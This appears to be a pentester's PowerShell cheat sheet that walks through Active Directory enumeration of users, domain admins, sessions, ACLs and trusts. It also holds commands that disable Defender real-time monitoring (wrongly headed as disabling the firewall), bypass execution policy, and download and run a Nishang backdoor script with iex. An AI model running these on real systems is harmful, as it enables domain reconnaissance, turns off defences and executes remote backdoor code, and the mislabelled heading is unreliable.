Powershell Begineer

Powershell Help system :

List everything which contains the word process :

PS C:\Users\victim6\Downloads\new\new> get-help *process*

PS C:\Users\victim6\Downloads\new\new> get-help about_*

PS C:\Users\victim6\Downloads\new\new> $psversiontable

PS C:\Users\victim6\Downloads\new\new> get-help Get-Process -Parameter name

PS C:\Users\victim6\Downloads\new\new> get-help *

Update the help system (v3+)

PS C:\Users\victim6\Downloads\new\new> update-help

List full help about a topic

PS C:\Users\victim6\Downloads\new\new> get-help get-item

Lists examples of how to run a cmdlet :

PS C:\Users\victim6\Downloads\new\new> get-help get-item –Examples

Powershell cmdlets :

PS C:\Users\victim6\Downloads\new\new> Get-Alias -name dir

PS C:\Users\victim6\Downloads\new\new> Get-Alias -Definition Get-ChildItem

Use the below command for listing all cmdlets :

PS C:\Users\victim6\Downloads\new\new> Get-Command -CommandType cmdlet

There are many interesting cmdlets from a pentester’s perspective:

PS C:\Users\victim6\Downloads\new\new> Get-Command -CommandType Cmdlet | Measure-Object

PS C:\Users\victim6\Downloads\new\new> Get-Command -name *process*

PS C:\Users\victim6\Downloads\new\new> Get-Command -Verb set

Disable the firewall :

PS C:\Users\victim6\Downloads\new\new> Set-MpPreference -DisableRealtimeMonitoring $true

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> Get-ExecutionPolicy

Powershell scripts : execution policy:

Use below command to bypass the execution:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> powershell -ep bypass

https://github.com/NetSPI/PowerUpSQL.git

PS C:\Users\victim6\Downloads\PowerUpSQL-master\PowerUpSQL-master> Import-Module .\PowerUpSQL.ps1 –verbose

PS C:\Users\victim6\Downloads\PowerUpSQL-master\PowerUpSQL-master> Get-Module –ListAvailable

PS C:\Users\victim6\Downloads\PowerUpSQL-master\PowerUpSQL-master> Get-Command -Module PowerUpSQL

Download execute cradle:

 PS C:\Users\victim6> iex (New-Object net.webclient).DownloadString(‘https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1’)

Encoded command :

https://github.com/danielbohannon/Invoke-CradleCrafter

PS C:\Users\victim6\Downloads\Invoke-CradleCrafter-master\Invoke-CradleCrafter-master> help powershell

Powershell AD:

Domain Enumeration:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> net localgroup administrators

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Import-ActiveDirectory.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> help Import-ActiveDirectory –Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-ActiveDirectory -Dllpath .\Microsoft.ActiveDirectory.Management.dll -admodulepath .\ActiveDirectory\ActiveDirectory.psd1 -verbose

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetDomain -Domain security.local

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> (Get-ADDomain).domainsid

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> (Get-ADDomain).domainsid.value

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetDomainController

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADDomainController

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetUser

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> get-netuser | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> get-netuser -Domain security.local | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter *

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter * -Properties *

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter * -Properties * | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Identity victim6

Get all the groups in the current domain:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetGroup

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetGroup *admin*

Using Active directory Module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADGroup -filter * | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADGroup -filter ‘name -like “*admin*”‘ | select name

Get all the members of the domain admins group:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetGroupMember -GroupName “domain admins”

Using Active directory module :

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADGroupMember -Identity “domain admins” –Recursive

Get the group membership for a user:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetGroup -UserName “victim”

Using Active directory module :

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADPrincipalGroupMembership -Identity administrator

Get all computers of the domain :

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetComputer

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetComputer –FullData

Using ActiveDirectory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADGroup -filter * | select name

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADGroup -filter * -Properties *

Find all machine on the current domain where the current user has local admin access :

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Find-LocalAdminAccess –Verbose

Find local admins on all machines of the domain:

List sessions on a particular computer:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetSession -ComputerName WIN-2RUMVG5JPOC

Find computers where a domain admin is logged in & current user has access :

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Invoke-UserHunter –checkaccess

DOMAIN Enumeration – ACL:

Get the ACL’s associated with the specified object:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ObjectAcl -SamAccountName administrator –ResolveGUIDs

Get the ACL’s associated with the specified prefix to be used for search:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> get-objectacl -ADSprefix ‘CN=administrator,CN=Users’ –Verbose

We can also enumerate ACL’s using Active Directory module but without resolving GUIDs:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> (Get-Acl ‘AD:\CN=administrator,CN=users,DC=security,DC=local’).Access

To look for interesting ACE’s:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Invoke-ACLScanner –ResolveGUIDs

Domain enumeration trusts:

Get a list of all domain trusts for the current domain:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetDomaintrust

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetDomaintrust -Domain security.local

Using active directory module :

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADTrust -filter *

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADTrust -Identity ujjtest.security.local

Get details about the current forest:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForest

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForest -Forest security.local

Using active directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADForest

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADForest -Identity security.local

Get all domains in the current forest:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForestDomain

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForestDomain -Forest security.local

Using Active Directory module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> (Get-ADForest).domains

Get trusts in the forest:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForestTrust

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-NetForestTrust -Forest security.local

Using active directry module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADTrust -filter ‘msDS-TrustForestinfo -ne “$null”‘

@Saksham Dixit